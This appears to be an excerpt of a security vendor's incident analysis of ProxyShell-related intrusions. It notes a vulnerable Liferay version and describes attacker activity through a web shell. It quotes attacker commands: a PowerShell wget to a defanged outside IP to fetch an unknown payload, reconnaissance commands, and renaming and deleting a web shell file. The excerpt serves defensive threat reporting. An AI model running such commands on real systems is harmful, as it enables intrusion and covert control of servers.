Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.

“C:WindowsSystem32cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig cmd.exe /c dir “c:windowssystem32cmd.exe” /c ping -n 1 “c:windowssystem32cmd.exe” /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx “c:windowssystem32cmd.exe” /c del

Read the article